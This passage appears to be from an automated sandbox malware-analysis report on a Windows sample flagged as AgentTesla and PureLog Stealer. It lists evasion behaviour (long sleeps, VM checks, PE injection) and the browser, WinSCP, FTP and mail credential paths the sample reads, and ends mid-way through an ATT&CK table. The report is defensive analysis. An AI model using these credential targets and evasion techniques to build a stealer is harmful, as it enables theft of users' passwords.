                        Source: C:\Users\user\AppData\Roaming\itdtn.exeMemory allocated: 3170000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeMemory allocated: 2F80000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeMemory allocated: 1AC0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeMemory allocated: 32D0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeMemory allocated: 52D0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_06FE7D9B rdtsc 5_2_06FE7D9B
                        Source: C:\Users\user\Desktop\Copy#51007602.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeWindow / User API: threadDelayed 1146Jump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeWindow / User API: threadDelayed 2238Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeWindow / User API: threadDelayed 2891Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeWindow / User API: threadDelayed 696Jump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 3144Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 2200Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 2200Thread sleep time: -100000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 4836Thread sleep count: 1146 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 2200Thread sleep time: -99891s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 4836Thread sleep count: 2238 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 2200Thread sleep time: -99782s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 2200Thread sleep time: -99657s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 2200Thread sleep time: -99532s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 2200Thread sleep time: -99422s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 2200Thread sleep time: -99313s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 2200Thread sleep time: -99188s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 2200Thread sleep time: -99063s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 2200Thread sleep time: -98938s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 2200Thread sleep time: -98797s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 2200Thread sleep time: -98687s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 2200Thread sleep time: -98577s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 2200Thread sleep time: -98469s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 2200Thread sleep time: -98327s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 2200Thread sleep time: -98219s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 2200Thread sleep time: -98110s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exe TID: 2200Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 5744Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 1276Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 1276Thread sleep time: -100000s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 1276Thread sleep time: -99875s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 6204Thread sleep count: 2891 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 6204Thread sleep count: 696 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 1276Thread sleep time: -99765s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 1276Thread sleep time: -99656s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 1276Thread sleep time: -99547s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 1276Thread sleep time: -99422s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 1276Thread sleep time: -99312s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 1276Thread sleep time: -99203s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 1276Thread sleep time: -99094s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 1276Thread sleep time: -98969s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 1276Thread sleep time: -98859s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 1276Thread sleep time: -98750s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 1276Thread sleep time: -98640s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 1276Thread sleep time: -98531s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 1276Thread sleep time: -98422s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 1276Thread sleep time: -98310s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 1276Thread sleep time: -98203s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 1276Thread sleep time: -98094s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exe TID: 1276Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Users\user\Desktop\Copy#51007602.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\Desktop\Copy#51007602.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\Copy#51007602.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeThread delayed: delay time: 100000Jump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeThread delayed: delay time: 99891Jump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeThread delayed: delay time: 99782Jump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeThread delayed: delay time: 99657Jump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeThread delayed: delay time: 99532Jump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeThread delayed: delay time: 99422Jump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeThread delayed: delay time: 99313Jump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeThread delayed: delay time: 99188Jump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeThread delayed: delay time: 99063Jump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeThread delayed: delay time: 98938Jump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeThread delayed: delay time: 98797Jump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeThread delayed: delay time: 98687Jump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeThread delayed: delay time: 98577Jump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeThread delayed: delay time: 98469Jump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeThread delayed: delay time: 98327Jump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeThread delayed: delay time: 98219Jump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeThread delayed: delay time: 98110Jump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeThread delayed: delay time: 100000Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeThread delayed: delay time: 99875Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeThread delayed: delay time: 99765Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeThread delayed: delay time: 99656Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeThread delayed: delay time: 99547Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeThread delayed: delay time: 99422Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeThread delayed: delay time: 99312Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeThread delayed: delay time: 99203Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeThread delayed: delay time: 99094Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeThread delayed: delay time: 98969Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeThread delayed: delay time: 98859Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeThread delayed: delay time: 98750Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeThread delayed: delay time: 98640Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeThread delayed: delay time: 98531Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeThread delayed: delay time: 98422Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeThread delayed: delay time: 98310Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeThread delayed: delay time: 98203Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeThread delayed: delay time: 98094Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: itdtn.exe, 00000005.00000002.3232710766.000000000177A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
                        Source: itdtn.exe, 00000004.00000002.2229535791.0000000003371000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                        Source: itdtn.exe, 00000004.00000002.2229535791.0000000003371000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                        Source: Copy#51007602.exe, 00000002.00000002.3232678455.000000000161D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeCode function: 5_2_06FE7D9B rdtsc 5_2_06FE7D9B
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Injects a PE file into a foreign processes
                        Source: C:\Users\user\Desktop\Copy#51007602.exeMemory written: C:\Users\user\Desktop\Copy#51007602.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeMemory written: C:\Users\user\AppData\Roaming\itdtn.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeProcess created: C:\Users\user\Desktop\Copy#51007602.exe "C:\Users\user\Desktop\Copy#51007602.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeProcess created: C:\Users\user\AppData\Roaming\itdtn.exe "C:\Users\user\AppData\Roaming\itdtn.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeQueries volume information: C:\Users\user\Desktop\Copy#51007602.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeQueries volume information: C:\Users\user\Desktop\Copy#51007602.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeQueries volume information: C:\Users\user\AppData\Roaming\itdtn.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeQueries volume information: C:\Users\user\AppData\Roaming\itdtn.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Yara detected AgentTesla
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 4.2.itdtn.exe.506b9a8.11.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.itdtn.exe.506b9a8.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Copy#51007602.exe.40111f0.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Copy#51007602.exe.3de7dd0.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Copy#51007602.exe.3bbe9a0.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000005.00000002.3236815937.0000000003347000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.3235618888.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.2229535791.0000000003633000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.3236815937.0000000003321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.2235868873.0000000005056000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.3231826482.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.3235618888.0000000003307000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2114770908.0000000003991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Copy#51007602.exe PID: 6008, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Copy#51007602.exe PID: 4084, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: itdtn.exe PID: 2604, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: itdtn.exe PID: 3936, type: MEMORYSTR
                        Yara detected PureLog Stealer
                        Source: Yara matchFile source: 0.2.Copy#51007602.exe.50d0000.15.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Copy#51007602.exe.3bbe9a0.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Copy#51007602.exe.50d0000.15.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Copy#51007602.exe.3de7dd0.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Copy#51007602.exe.40111f0.11.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Copy#51007602.exe.40111f0.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Copy#51007602.exe.3de7dd0.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Copy#51007602.exe.3bbe9a0.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.2123443818.00000000050D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2114770908.0000000003991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                        Source: C:\Users\user\Desktop\Copy#51007602.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                        Tries to harvest and steal ftp login credentials
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                        Tries to steal Mail credentials (via file / registry access)
                        Source: C:\Users\user\Desktop\Copy#51007602.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                        Source: C:\Users\user\Desktop\Copy#51007602.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                        Source: C:\Users\user\AppData\Roaming\itdtn.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                        Source: Yara matchFile source: 4.2.itdtn.exe.506b9a8.11.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.itdtn.exe.506b9a8.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Copy#51007602.exe.40111f0.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Copy#51007602.exe.3de7dd0.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Copy#51007602.exe.3bbe9a0.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000002.00000002.3235618888.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.2229535791.0000000003633000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.3236815937.0000000003321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.2235868873.0000000005056000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.3231826482.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2114770908.0000000003991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Copy#51007602.exe PID: 6008, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Copy#51007602.exe PID: 4084, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: itdtn.exe PID: 2604, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: itdtn.exe PID: 3936, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected AgentTesla
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 4.2.itdtn.exe.506b9a8.11.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.itdtn.exe.506b9a8.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Copy#51007602.exe.40111f0.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Copy#51007602.exe.3de7dd0.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Copy#51007602.exe.3bbe9a0.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000005.00000002.3236815937.0000000003347000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.3235618888.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.2229535791.0000000003633000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.3236815937.0000000003321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.2235868873.0000000005056000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.3231826482.000000000042F000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.3235618888.0000000003307000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2111351064.0000000002B74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2114770908.0000000003991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Copy#51007602.exe PID: 6008, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Copy#51007602.exe PID: 4084, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: itdtn.exe PID: 2604, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: itdtn.exe PID: 3936, type: MEMORYSTR
                        Yara detected PureLog Stealer
                        Source: Yara matchFile source: 0.2.Copy#51007602.exe.50d0000.15.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Copy#51007602.exe.3bbe9a0.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Copy#51007602.exe.50d0000.15.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Copy#51007602.exe.3de7dd0.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Copy#51007602.exe.40111f0.11.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Copy#51007602.exe.40111f0.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Copy#51007602.exe.3de7dd0.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.Copy#51007602.exe.3bbe9a0.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.2123443818.00000000050D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2114770908.0000000003991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                        Windows Management Instrumentation                        		1
                        DLL Side-Loading                        		1
                        DLL Side-Loading                        		1
                        Disable or Modify Tools                        		2
                        OS Credential Dumping                        		1
                        File and Directory Discovery                        		Remote Services1
                        Archive Collected Data                        		1
                        Ingress Tool Transfer                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault AccountsScheduled Task/Job1
